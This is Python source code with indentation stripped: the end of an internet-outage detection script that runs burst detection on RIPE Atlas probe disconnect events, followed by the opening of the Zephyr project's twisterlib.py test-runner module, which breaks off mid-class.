raise ConnectionError("Error")
def on_connect(*args):
# print "got in on_connect"
# print args
return
def on_reconnect(*args):
# print "got in on_reconnect"
# print args
# raise ConnectionError("Reconnection")
return
def on_close(*args):
# print "got in on_close"
# print args
raise ConnectionError("Closed")
def on_disconnect(*args):
# print "got in on_disconnect"
# print args
# raise ConnectionError("Disconnection")
return
def on_connect_error(*args):
# print "got in on_connect_error"
# print args
raise ConnectionError("Connection Error")
def on_atlas_error(*args):
# print "got in on_atlas_error"
# print args
return
def on_atlas_unsubscribe(*args):
# print "got in on_atlas_unsubscribe"
# print args
raise ConnectionError("Unsubscribed")
def getLiveRestAPI():
WINDOW = 600
global READ_OK
currentTS = int((datetime.utcnow() - datetime.utcfromtimestamp(0)).total_seconds())
while True:
try:
kwargs = {
"msm_id": 7000,
"start": datetime.utcfromtimestamp(currentTS - WINDOW),
"stop": datetime.utcfromtimestamp(currentTS),
}
is_success, results = AtlasResultsRequest(**kwargs).create()
READ_OK = False
if is_success:
for ent in results:
on_result_response(ent)
READ_OK = True
time.sleep(WINDOW)
currentTS += (WINDOW + 1)
except:
traceback.print_exc()
""""""
def getCleanVal(val, tsClean):
# Return the smallest value strictly greater than `val` that is not already in tsClean.
newVal = val + 1
while newVal in tsClean:
newVal += 1
return newVal
def getTimeStampsForBurstyProbes(burstyProbes,burstDict,burstEventDict):
burstyProbeInfoDict={}
for event in dataList:
if event["event"] == "disconnect":
eventTime=float(event['timestamp'])
pid=event["prb_id"]
if pid in burstyProbes:
for state,timeDictList in burstDict.items():
if state >= BURST_THRESHOLD:
eventID=getEventID(burstEventDict,event)
for timeDict in timeDictList:
if eventID and eventTime>=timeDict['start'] and eventTime<=timeDict['end']:
if pid not in burstyProbeInfoDict.keys():
burstyProbeInfoDict[pid]={}
if state not in burstyProbeInfoDict[pid].keys():
burstyProbeInfoDict[pid][state]={}
if eventID not in burstyProbeInfoDict[pid][state].keys():
burstyProbeInfoDict[pid][state][eventID]=[]
burstyProbeInfoDict[pid][state][eventID].append(event["timestamp"])
#pp.pprint(burstyProbeInfoDict)
return burstyProbeInfoDict
def correlateWithConnectionEvents(burstyProbeInfoDictIn):
# Extremely unoptimized way to do this. Need to rewrite this function.
#pp.pprint(burstyProbeInfoDict)
burstyProbeInfoDict=burstyProbeInfoDictIn
allInBurstIDs=[]
burstyProbeDurations={}
for event in dataList:
if event["event"] == "connect":
pid=event["prb_id"]
if pid in burstyProbeInfoDict.keys():
for state in burstyProbeInfoDict[pid].keys():
for burstID,tmpSList in burstyProbeInfoDict[pid][state].items():
allInBurstIDs.append(burstID)
for tmpS in tmpSList:
eventTS=float(event["timestamp"])
if eventTS >tmpS:
burstyProbeInfoDict[pid][state][burstID].remove(tmpS)
duration=eventTS-tmpS
if burstID not in burstyProbeDurations.keys():
burstyProbeDurations[burstID]={}
if pid not in burstyProbeDurations[burstID].keys():
burstyProbeDurations[burstID][pid]={}
if state not in burstyProbeDurations[burstID][pid].keys():
burstyProbeDurations[burstID][pid][state]=[]
burstyProbeDurations[burstID][pid][state].append({"disconnect":tmpS,"connect":eventTS,"duration":duration})
# Remove bursts where fewer than half of the bursty probes reconnected
cleanBurstyProbeDurations={}
ongoingBurstIDs=[]
for bid in burstyProbeDurations.keys():
lenProbeConnVal=len(burstyProbeDurations[bid])
if lenProbeConnVal >= float(len(burstyProbeInfoDict.keys()))/2:
cleanBurstyProbeDurations[bid]=burstyProbeDurations[bid]
burstyProbeDurationsOngoing={}
'''
for pid in burstyProbeInfoDict.keys():
for state in burstyProbeInfoDict[pid].keys():
for burstID, tmpSList in burstyProbeInfoDict[pid][state].items():
if burstID in cleanBurstyProbeDurations.keys():
continue
for tmpS in tmpSList:
if burstID not in burstyProbeDurationsOngoing.keys():
burstyProbeDurationsOngoing[burstID] = {}
if pid not in burstyProbeDurationsOngoing[burstID].keys():
burstyProbeDurationsOngoing[burstID][pid] = {}
if state not in burstyProbeDurationsOngoing[burstID][pid].keys():
burstyProbeDurationsOngoing[burstID][pid][state] = []
burstyProbeDurationsOngoing[burstID][pid][state].append(
{"disconnect": tmpS, "connect": -1, "duration": -1})
'''
return burstyProbeDurationsOngoing,cleanBurstyProbeDurations
def getUniqueSignalInEvents(eventList):
signalMapCountries = {}
masterProbeLocList = []
seenProbes = set()
probeIDFilterByDistance = {}
for event in eventList:
try:
probeID = int(event['prb_id'])
if 'All' not in signalMapCountries.keys():
signalMapCountries['All'] = set()
signalMapCountries['All'].add(probeID)
if SPLIT_SIGNAL:
try:
country = probeInfo.probeIDToCountryDict[probeID]
if country not in signalMapCountries.keys():
signalMapCountries[country] = set()
signalMapCountries[country].add(probeID)
except:
# No country code available
pass
try:
asn = int(probeInfo.probeIDToASNDict[probeID])
if asn not in signalMapCountries.keys():
signalMapCountries[asn] = set()
signalMapCountries[asn].add(probeID)
except:
# No ASN available
pass
try:
locDict = probeInfo.probeIDToLocDict[probeID]
if probeID not in seenProbes:
masterProbeLocList.append([probeID, locDict['lat'], locDict['lon']])
seenProbes.add(probeID)
except:
traceback.print_exc()
except:
pass # Not a valid event
if SPLIT_SIGNAL:
for iter in range(0, len(masterProbeLocList) - 1):
id, lat, lon = masterProbeLocList[iter]
for iter2 in range(iter + 1, len(masterProbeLocList)):
id2, lat2, lon2 = masterProbeLocList[iter2]
dist = haversine(lon, lat, lon2, lat2)
if dist <= probeClusterDistanceThreshold:
prKey = 'pid-' + str(id)
if prKey not in probeIDFilterByDistance.keys():
probeIDFilterByDistance[prKey] = set()
probeIDFilterByDistance[prKey].add(id)
probeIDFilterByDistance[prKey].add(id2)
# Add unique sets to main dict
ignoreID = []
for prbID, prbSet in probeIDFilterByDistance.items():
if prbID in ignoreID:
continue
redundantSet = False
for prbID2, prbSet2 in probeIDFilterByDistance.items():
if prbID != prbID2:
if prbSet == prbSet2:
ignoreID.append(prbID2)
if prbID not in signalMapCountries.keys():
signalMapCountries[prbID] = set()
signalMapCountries[prbID] = prbSet
logging.info('Events from {0} probes observed'.format(len(seenProbes)))
return signalMapCountries
def applyBurstThreshold(burstsDict, eventsList):
thresholdedEvents = []
for event in eventsList:
insertFlag = False
for state, timeDictList in burstsDict.items():
if state >= BURST_THRESHOLD:
for timeDict in timeDictList:
if float(event['timestamp']) >= timeDict['start'] and float(event['timestamp']) <= timeDict['end']:
insertFlag = True
if insertFlag:
thresholdedEvents.append(event)
return thresholdedEvents
def getFilteredEvents(eventLocal):
interestingEvents = []
for event in eventLocal:
sys.stdout.flush()
try:
if event['prb_id'] in selectedProbeIds:
interestingEvents.append(event)
except:
traceback.print_exc()
logging.error('Error in selecting interesting events')
return interestingEvents
def groupByProbeID(eventsList):
probeIDDict = {}
for evt in eventsList:
prbID = evt['prb_id']
if prbID not in probeIDDict.keys():
probeIDDict[prbID] = 1
else:
probeIDDict[prbID] += 1
return probeIDDict
def groupByASN(eventsList):
ASNDict = {}
for evt in eventsList:
if evt['asn']:
asn = int(evt['asn'])
insertBool = True
if asnFilterEnabled:
if asn not in filterDict['asn']:
insertBool = False
if insertBool:
if asn not in ASNDict.keys():
ASNDict[asn] = set()
ASNDict[asn].add(evt['prb_id'])
filteredASNDict = {}
impactVals = []
noInfoASNs = []
for k, v in ASNDict.items():
try:
impactVals.append(float(len(v)) / float(len(probeInfo.asnToProbeIDDict[k])))
except KeyError:
logging.warning('Key {0} not found'.format(k))
noInfoASNs.append(k)
continue
avgImpact = np.average(impactVals) / 3
# print(noInfoASNs)
avgImpact = 0  # the computed threshold is immediately overridden, effectively disabling the impact filter
logging.info('Threshold Average Impact is {0}.'.format(avgImpact))
for k, v in ASNDict.items():
try:
if k not in noInfoASNs:
numProbesASOwns = len(probeInfo.asnToProbeIDDict[k])
if numProbesASOwns > 5:
numProbesInASDisconnected = len(v)
asnImpact = float(numProbesInASDisconnected) / float(numProbesASOwns)
if asnImpact > 1:
# print('Abnormal AS',k,numProbesInASDisconnected,numProbesASOwns)
asnImpact = 1
# print(float(len(v)),float(len(asnToProbeIDDict[k])))
# print(asnImpact,avgImapct)
if asnImpact >= avgImpact:
filteredASNDict[k] = asnImpact
except KeyError:
logging.error('Key {0} not found'.format(k))
print('Key {0} not found'.format(k))
exit(1)
return filteredASNDict
def groupByCountry(eventsList):
probeIDToCountryDict = probeInfo.probeIDToCountryDict
CountryDict = {}
for evt in eventsList:
id = evt['prb_id']
if id in probeIDToCountryDict.keys():
insertBool = True
if countryFilterEnabled:
if probeIDToCountryDict[id] not in filterDict['country_code']:
insertBool = False
if insertBool:
if probeIDToCountryDict[id] not in CountryDict.keys():
CountryDict[probeIDToCountryDict[id]] = 1
else:
CountryDict[probeIDToCountryDict[id]] += 1
else:
# x=1
# if evt['event']=='connect':
logging.warning('No mapping found for probe ID {0}'.format(id))
return CountryDict
def kleinberg(data, probesInUnit=1, timeRange=8640000, verbose=5):
ts = np.array(data)
bursts = pybursts.kleinberg(ts, s=s, T=timeRange, n=probesInUnit * nScalar, gamma=gamma)
return bursts
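# Note: pybursts.kleinberg() returns one row per detected burst in the form
# [burst_level, start_time, end_time]; workerThread() below unpacks rows as
# brt[0], brt[1], brt[2] when building burstsDict.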
def getData(dataFile):
try:
data = json.load(gzip.open(dataFile))
for event in data:
try:
dataList.append(event)
if DETECT_DISCO_BURST:
if event["event"] == "disconnect":
dataQueueDisconnect.put(event)
if DETECT_CON_BURST:
if event["event"] == "connect":
dataQueueConnect.put(event)
except KeyError:
pass
except:
traceback.print_exc()
def getBurstEventIDDict(burstDict):
burstEventDict = {}
burstEventID = 1
for state, timeDictList in burstDict.items():
if state == BURST_THRESHOLD:
for timeDict in timeDictList:
burstEventDict[burstEventID] = {'start': timeDict['start'], 'end': timeDict['end']}
burstEventID += 1
return burstEventDict
def getEventID(burstEventDict, event):
eventID = None
for eID, times in burstEventDict.items():
if float(event['timestamp']) >= times['start'] and float(event['timestamp']) <= times['end']:
eventID = eID
break
return eventID
def haversine(lon1, lat1, lon2, lat2):
"""
Calculate the great circle distance between two points
on the earth (specified in decimal degrees)
"""
try:
# convert decimal degrees to radians
lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])
# haversine formula
dlon = lon2 - lon1
dlat = lat2 - lat1
a = np.sin(dlat / 2) ** 2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon / 2) ** 2
c = 2 * np.arcsin(np.sqrt(a))
km = 6367 * c
return km
except:
print(lon1, lat1, lon2, lat2)
traceback.print_exc()
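# Rough sanity check (example values, not from the original source):
# haversine(-0.13, 51.51, 2.35, 48.86) -- London to Paris -- returns roughly 343 km.
# Distances below probeClusterDistanceThreshold are used to cluster nearby probes.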
def getPerEventStats(burstyProbeDurations,burstyProbeDurationsOngoing,numProbesInUnit,output,key):
burstEventInfo=[]
for id,inDict in burstyProbeDurations.items():
startTimes=[]
endTimes=[]
durations=[]
probeIds=[]
for pid,inDict2 in inDict.items():
try:
addrv4 = probeInfo.probeIDToAddrv4Dict[pid]
except:
continue
if addrv4 == 'None':
continue
maxState=max(inDict2.keys())
for infoDict in inDict2[maxState]:
startTimes.append(infoDict["disconnect"])
endTimes.append(infoDict["connect"])
durations.append(infoDict["duration"])
slash24vals = addrv4.split('.')
slash24 = slash24vals[0]+'.'+slash24vals[1]+'.'+slash24vals[2]+'.0/24'
probeIds.append({'probeID':pid,'slash24':slash24,'state':maxState,"start":infoDict["disconnect"],"end":infoDict["connect"]})
startMedian=np.median(np.array(startTimes))
endMedian=np.median(np.array(endTimes))
durationMedian=np.median(np.array(durations))
burstEventInfo.append([id,startMedian,endMedian,durationMedian,numProbesInUnit,probeIds])
output.write([id,key,startMedian,endMedian,durationMedian,numProbesInUnit,probeIds],output_format=output_format)
'''
for id,inDict in burstyProbeDurationsOngoing.items():
startTimes=[]
probeIds=[]
for pid,inDict2 in inDict.items():
maxState=max(inDict2.keys())
for infoDict in inDict2[maxState]:
startTimes.append(infoDict["disconnect"])
probeIds.append({'probeID':pid,'state':maxState,"start":infoDict["disconnect"],"end":-1})
startMedian=np.median(np.array(startTimes))
burstEventInfo.append([id,startMedian,-1,-1,numProbesInUnit,probeIds])
#output.write([id,startMedian,endMedian,durationMedian,numProbesInUnit,probeIds])
'''
return burstEventInfo
def workerThread(threadType):
intConCountryDict = {}
intConControllerDict = {}
intConASNDict = {}
intConProbeIDDict = {}
global numSelectedProbesInUnit # Probes after user filter
global READ_OK
global dataTimeRangeInSeconds
numProbesInUnit = 0
pendingEvents = collections.deque(maxlen=200000)
while True:
eventLocal = []
filesToEmail = []
if not READ_OK:
while not READ_OK:
time.sleep(WAIT_TIME)
else:
time.sleep(WAIT_TIME)
lastQueuedTimestamp = int((datetime.utcnow() - datetime.utcfromtimestamp(0)).total_seconds())
if threadType == 'con':
itemsToRead = dataQueueConnect.qsize()
elif threadType == 'dis':
itemsToRead = dataQueueDisconnect.qsize()
else:
print('Unknown thread type!')
exit(1)
allPrevTS = set()
for eves in pendingEvents:
allPrevTS.add(eves['timestamp'])
eventLocal.append(eves)
itrFromThread = itemsToRead
itr2 = itrFromThread + len(eventLocal)
prevEvs = itr2 - itrFromThread
try:
if prevEvs > 0:
microSecAddFactor = (lastQueuedTimestamp - min(allPrevTS)) * 100
dataTimeRangeInSeconds += microSecAddFactor
except:
traceback.print_exc()
logging.info('Events Info - Current:{0} Previous:{1} Total:{2}'.format(itemsToRead, prevEvs, itr2))
if itr2 > 1:
if itemsToRead > 1:
while itemsToRead:
if threadType == 'con':
event = dataQueueConnect.get()
else:
event = dataQueueDisconnect.get()
eventLocal.append(event)
itemsToRead -= 1
interestingEvents = getFilteredEvents(eventLocal)
if len(interestingEvents) < 1:
for iter in range(0, itrFromThread):
if threadType == 'con':
dataQueueConnect.task_done()
else:
dataQueueDisconnect.task_done()
continue
dataDate = datetime.utcfromtimestamp(interestingEvents[0]["timestamp"]).strftime('%Y%m%d')
signalMapCountries = getUniqueSignalInEvents(interestingEvents)
# Manage duplicate values
for key, probeIDSet in signalMapCountries.items():
numProbesInUnit = 0
asnKey = False
countryKey = False
probeKey = False
allKey = False
if not SPLIT_SIGNAL:
if key != 'All':
continue
try:
asn = int(key)
numProbesInUnit = len(probeInfo.asnToProbeIDDict[asn])
asnKey = True
except:
try:
if key == 'All':
numProbesInUnit = numSelectedProbesInUnit
allKey = True
else:
if 'pid' in key:
numProbesInUnit = len(probeIDSet)
probeKey = True
else:
numProbesInUnit = len(probeInfo.countryToProbeIDDict[key])
countryKey = True
except:
logging.error('Error in getting number of probes in unit for key: {0}'.format(key))
print('Error in getting number of probes in unit for key: {0}'.format(key))
continue
if numProbesInUnit < MIN_PROBES:
continue
timestampDict = {}
eventClean = []
tsClean = []
probesInFilteredData = set()
for eventVal in interestingEvents:
pID = int(eventVal['prb_id'])
asn = None
try:
asn = int(eventVal['asn'])
except:
pass
if (asnKey and key == asn) or (countryKey and key == probeInfo.probeIDToCountryDict[pID]) or (
probeKey and int(key.split('-')[1]) in probeIDSet) or allKey:
if pID in probeIDSet:
tStamp = float(eventVal['timestamp'])
eventVal['timestamp'] = tStamp
if tStamp not in timestampDict.keys():
timestampDict[tStamp] = 1
else:
timestampDict[tStamp] += 1
eventClean.append(eventVal)
probesInFilteredData.add(pID)
for tStamp, numOfRep in timestampDict.items():
for gr in range(0, numOfRep):
tsClean.append((tStamp) + (gr / numOfRep))
if len(tsClean) < SIGNAL_LENGTH:
continue
tsClean.sort()
balancedNumProbes = int(numProbesInUnit * (dataTimeRangeInSeconds / 8640000))
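# Assumption: 8640000 appears to be one day (86400 s) scaled by the same x100
# factor applied to WAIT_TIME / dataTimeRangeInSeconds elsewhere in this file,
# so this scales the expected probe count down to the current observation window.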
if balancedNumProbes == 0:
balancedNumProbes = 1
bursts = kleinberg(tsClean, timeRange=dataTimeRangeInSeconds, probesInUnit=balancedNumProbes)
burstsDict = {}
for brt in bursts:
q = brt[0]
qstart = brt[1]
qend = brt[2]
if q not in burstsDict.keys():
burstsDict[q] = []
tmpDict = {'start': float(qstart), 'end': float(qend)}
burstsDict[q].append(tmpDict)
thresholdedEvents = applyBurstThreshold(burstsDict, eventClean)
logging.info('Number of thresholded events: ' + str(len(thresholdedEvents)) + ' for key: ' + str(key))
if len(thresholdedEvents) > 0:
intConProbeIDDict = groupByProbeID(thresholdedEvents)
if threadType == 'dis':
burstyProbeIDs = intConProbeIDDict.keys()
burstEventDict = getBurstEventIDDict(burstsDict)
burstyProbeInfoDict = getTimeStampsForBurstyProbes(burstyProbeIDs, burstsDict, burstEventDict)
burstyProbeDurationsOngoing, burstyProbeDurations = correlateWithConnectionEvents(
burstyProbeInfoDict)
# Probes that had corresponding connect events
probesWhichGotConnected = []
for _, inDict in burstyProbeDurations.items():
for pid, _ in inDict.items():
probesWhichGotConnected.append(pid)
probesWhichDidntConnect = []
for everyPr in burstyProbeIDs:
if everyPr not in probesWhichGotConnected:
probesWhichDidntConnect.append(everyPr)
# Calculate new pending events
newPendingEvents = []
for event in eventClean:
try:
if event['prb_id'] in probesWhichDidntConnect:
newPendingEvents.append(event)
except:
traceback.print_exc()
logging.error('Error in selecting interesting events')
pendingEvents = newPendingEvents
output = outputWriter(
resultfilename='results/disco_events_' + dataDate + '_' + str(key) + '.txt')
if len(burstyProbeDurations) > 0:
filesToEmail.append(output)
logging.info('Burst was seen, call made to events stats.')
burstEventInfo = getPerEventStats(burstyProbeDurations, burstyProbeDurationsOngoing,
numProbesInUnit, output, key)
for iter in range(0, itrFromThread):
try:
# print('Task Done: {0} {1}'.format(iter,itrFromThread))
sys.stdout.flush()
if threadType == 'con':
dataQueueConnect.task_done()
else:
dataQueueDisconnect.task_done()
except ValueError:
pass
else:
for iter in range(0, itrFromThread):
try:
if threadType == 'con':
eve = dataQueueConnect.get()
dataQueueConnect.task_done()
else:
eve = dataQueueDisconnect.get()
dataQueueDisconnect.task_done()
except ValueError:
pass
if __name__ == "__main__":
configfile = 'conf/disco.conf'
config = configparser.ConfigParser()
try:
config.sections()
config.read(configfile)
except:
logging.error('Missing config: ' + configfile)
exit(1)
try:
READ_ONLINE = eval(config['RUN_PARAMS']['readStream'])
BURST_THRESHOLD = int(config['RUN_PARAMS']['burstLevelThreshold'])
SIGNAL_LENGTH = int(config['RUN_PARAMS']['minimumSignalLength'])
MIN_PROBES = int(config['RUN_PARAMS']['minimumProbesInUnit'])
WAIT_TIME = int(config['RUN_PARAMS']['waitTime'])
DETECT_DISCO_BURST = eval(config['RUN_PARAMS']['detectDisconnectBurst'])
DETECT_CON_BURST = eval(config['RUN_PARAMS']['detectConnectBurst'])
dataYear = config['RUN_PARAMS']['dataYear']
logLevel = config['RUN_PARAMS']['logLevel'].upper()
fastLoadProbeInfo = eval(config['RUN_PARAMS']['fastLoadProbeInfo'])
SPLIT_SIGNAL = eval(config['FILTERS']['splitSignal'])
gamma = float(config['KLEINBERG']['gamma'])
s = float(config['KLEINBERG']['s'])
nScalar = float(config['KLEINBERG']['nScalar'])
output_format = str(config['OUTPUT']['format'])
except:
print('Incorrect or missing parameter(s) in config file!')
exit(1)
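# Illustrative conf/disco.conf layout, inferred from the keys read by this script
# (here and in the FILTERS section below); the values shown are placeholders only:
#   [RUN_PARAMS]
#   readStream = True
#   burstLevelThreshold = 2
#   minimumSignalLength = 2
#   minimumProbesInUnit = 5
#   waitTime = 60
#   detectDisconnectBurst = True
#   detectConnectBurst = False
#   dataYear = 2017
#   logLevel = INFO
#   fastLoadProbeInfo = True
#   [FILTERS]
#   splitSignal = False
#   filterDict = {'asn': [3320], 'country_code': ['DE']}
#   probeClusterDistanceThreshold = 50
#   [KLEINBERG]
#   gamma = 1
#   s = 2
#   nScalar = 1
#   [OUTPUT]
#   format = json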
logging.basicConfig(filename='logs/{0}.log'.format(os.path.basename(sys.argv[0]).split('.')[0]), level=logLevel, \
format='[%(asctime)s] [%(levelname)s] %(message)s', datefmt='%m-%d-%Y %I:%M:%S')
logging.info('---Disco Live Initialized---')
logging.info('Using conf file {0}'.format(configfile))
global dataQueueDisconnect
global dataQueueConnect
# Probe Enrichment Info
probeInfo = probeEnrichInfo(dataYear=dataYear)
logging.info('Loading Probe Enrichment Info from {0}'.format(dataYear))
if fastLoadProbeInfo:
probeInfo.fastLoadInfo()
else:
probeInfo.loadInfoFromFiles()
if SIGNAL_LENGTH < 2:
logging.warning('User-given signal length too low; using the minimum signal length of 2.')
SIGNAL_LENGTH = 2 # Minimum 2 to detect burst
# Read filters and prepare a set of valid probe IDs
filterDict = eval(config['FILTERS']['filterDict'])
probeClusterDistanceThreshold = int(config['FILTERS']['probeClusterDistanceThreshold'])
numSelectedProbesInUnit = None
asnFilterEnabled = False
countryFilterEnabled = False
selectedProbeIdsASN = set()
selectedProbeIdsCountry = set()
for filterType in filterDict.keys():
if filterType == 'asn':
asnFilterEnabled = True
for val in filterDict[filterType]:
filterValue = int(val)
try:
for id in probeInfo.asnToProbeIDDict[filterValue]:
selectedProbeIdsASN.add(id)
except KeyError:
pass
elif filterType == 'country_code':
countryFilterEnabled = True
for val in filterDict[filterType]:
filterValue = val
try:
for id in probeInfo.countryToProbeIDDict[filterValue]:
selectedProbeIdsCountry.add(id)
except KeyError:
pass
elif filterType == 'pid':
countryFilterEnabled = True
for val in filterDict[filterType]:
pid1 = int(val)
try:
probelDict = probeInfo.probeIDToLocDict[pid1]
lat = probelDict['lat']
lon = probelDict['lon']
for prD, probelDictIn in probeInfo.probeIDToLocDict.items():
lat2 = probelDictIn['lat']
lon2 = probelDictIn['lon']
dist = haversine(lon, lat, lon2, lat2)
if dist <= probeClusterDistanceThreshold:
selectedProbeIdsCountry.add(prD)
except KeyError:
pass
selectedProbeIds = set()
if asnFilterEnabled and countryFilterEnabled:
selectedProbeIds = selectedProbeIdsASN.intersection(selectedProbeIdsCountry)
elif asnFilterEnabled:
selectedProbeIds = selectedProbeIdsASN
elif countryFilterEnabled:
selectedProbeIds = selectedProbeIdsCountry
if asnFilterEnabled or countryFilterEnabled:
logging.info('Filter {0} has {1} probes.'.format(filterDict, len(selectedProbeIds)))
else:
logging.info('No filter given, will use all probes')
selectedProbeIds = set(probeInfo.probeIDToCountryDict.keys())
numSelectedProbesInUnit = len(selectedProbeIds)
logging.info('Number of probes selected: {0}'.format(numSelectedProbesInUnit))
# print('Number of probes selected: {0}'.format(numProbesInUnit))
dataFile = None
dataTimeRangeInSeconds = None
# Variable to control when thread starts reading the data queue
READ_OK = True
if not READ_ONLINE:
try:
dataFile = sys.argv[1]
if os.path.isfile(dataFile) or dataFile is None:
if '_' not in dataFile:
logging.error('Data file name does not meet the requirement: it should contain "_".')
exit(1)
# print(dataTimeRangeInSeconds)
except:
logging.warning('Input parameter error, switching back to reading online stream.')
READ_ONLINE = True
ts = []
dataQueueDisconnect = Queue.Queue()
dataQueueConnect = Queue.Queue()
# dataList=[]
dataList = collections.deque(maxlen=200000)
pp = PrettyPrinter()
# Launch threads
if DETECT_DISCO_BURST:
for i in range(0, 1):
t = threading.Thread(target=workerThread, args=('dis',))
t.daemon = True
t.start()
if DETECT_CON_BURST:
for i in range(0, 1):
t = threading.Thread(target=workerThread, args=('con',))
t.daemon = True
t.start()
if READ_ONLINE:
if WAIT_TIME < 60:
logging.info('Thread wait time was too low, updated to 60 seconds.')
WAIT_TIME = 60
dataTimeRangeInSeconds = int(WAIT_TIME) * 100
logging.info('Reading Online with wait time {0} seconds.'.format(WAIT_TIME))
getLiveRestAPI()
dataQueueDisconnect.join()
dataQueueConnect.join()
else:
try:
eventFiles = []
if os.path.isdir(dataFile):
# eventFiles = [join(dataFile, f) for f in listdir(dataFile) if isfile(join(dataFile, f))]
for dp, dn, files in os.walk(dataFile):
for name in files:
eventFiles.append(os.path.join(dp, name))
else:
eventFiles.append(dataFile)
eventFiles = sorted(eventFiles)
for file in eventFiles:
if file.endswith('.gz'):
logging.info('Processing {0}'.format(file))
dataQueueDisconnect = Queue.Queue()
dataQueueConnect = Queue.Queue()
WAIT_TIME = 1
try:
dataTimeRangeInSeconds = int(eval(sys.argv[2])) * 100
except:
dataTimeRangeInSeconds = 8640000
# Make sure threads wait till the entire file is read
READ_OK = False
getData(file)
READ_OK = True
logging.info('Waiting for threads to finish processing events.')
dataQueueDisconnect.join()
dataQueueConnect.join()
else:
logging.info('Ignoring file {0}, it is not in the expected .gz format.'.format(file))
except:
logging.error('Error in reading file.')
raise Exception('Error in reading file.')
logging.info('---Disco Live Stopped---')
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import hashlib
import threading
from collections import OrderedDict
import queue
import time
import csv
import glob
import random
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_filter = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
def summary(self):
logger.debug("--------------------------------")
logger.debug(f"Total Test suites: {self.total}")
logger.debug(f"Total Test cases: {self.cases}")
logger.debug(f"Skipped test cases: {self.skipped_cases}")
logger.debug(f"Completed Testsuites: {self.done}")
logger.debug(f"Passing Testsuites: {self.passed}")
logger.debug(f"Failing Testsuites: {self.failed}")
logger.debug(f"Skipped Testsuites: {self.skipped_configs}")
logger.debug(f"Skipped Testsuites (runtime): {self.skipped_runtime}")
logger.debug(f"Skipped Testsuites (filter): {self.skipped_filter}")
logger.debug(f"Errors: {self.error}")
logger.debug("--------------------------------")
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_filter(self):
with self._skipped_filter.get_lock():
return self._skipped_filter.value
@skipped_filter.setter
def skipped_filter(self, value):
with self._skipped_filter.get_lock():
self._skipped_filter.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
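# Illustrative conversions (hypothetical variable names, line format per CACHE_ENTRY below):
#   CMAKE_BUILD_TYPE:STRING=Debug  -> CMakeCacheEntry(name='CMAKE_BUILD_TYPE', value='Debug')
#   ENABLE_FOO:BOOL=ON             -> CMakeCacheEntry(name='ENABLE_FOO', value=1)
#   SOME_LIST:STRING=a;b;c         -> CMakeCacheEntry(name='SOME_LIST', value=['a', 'b', 'c'])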
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
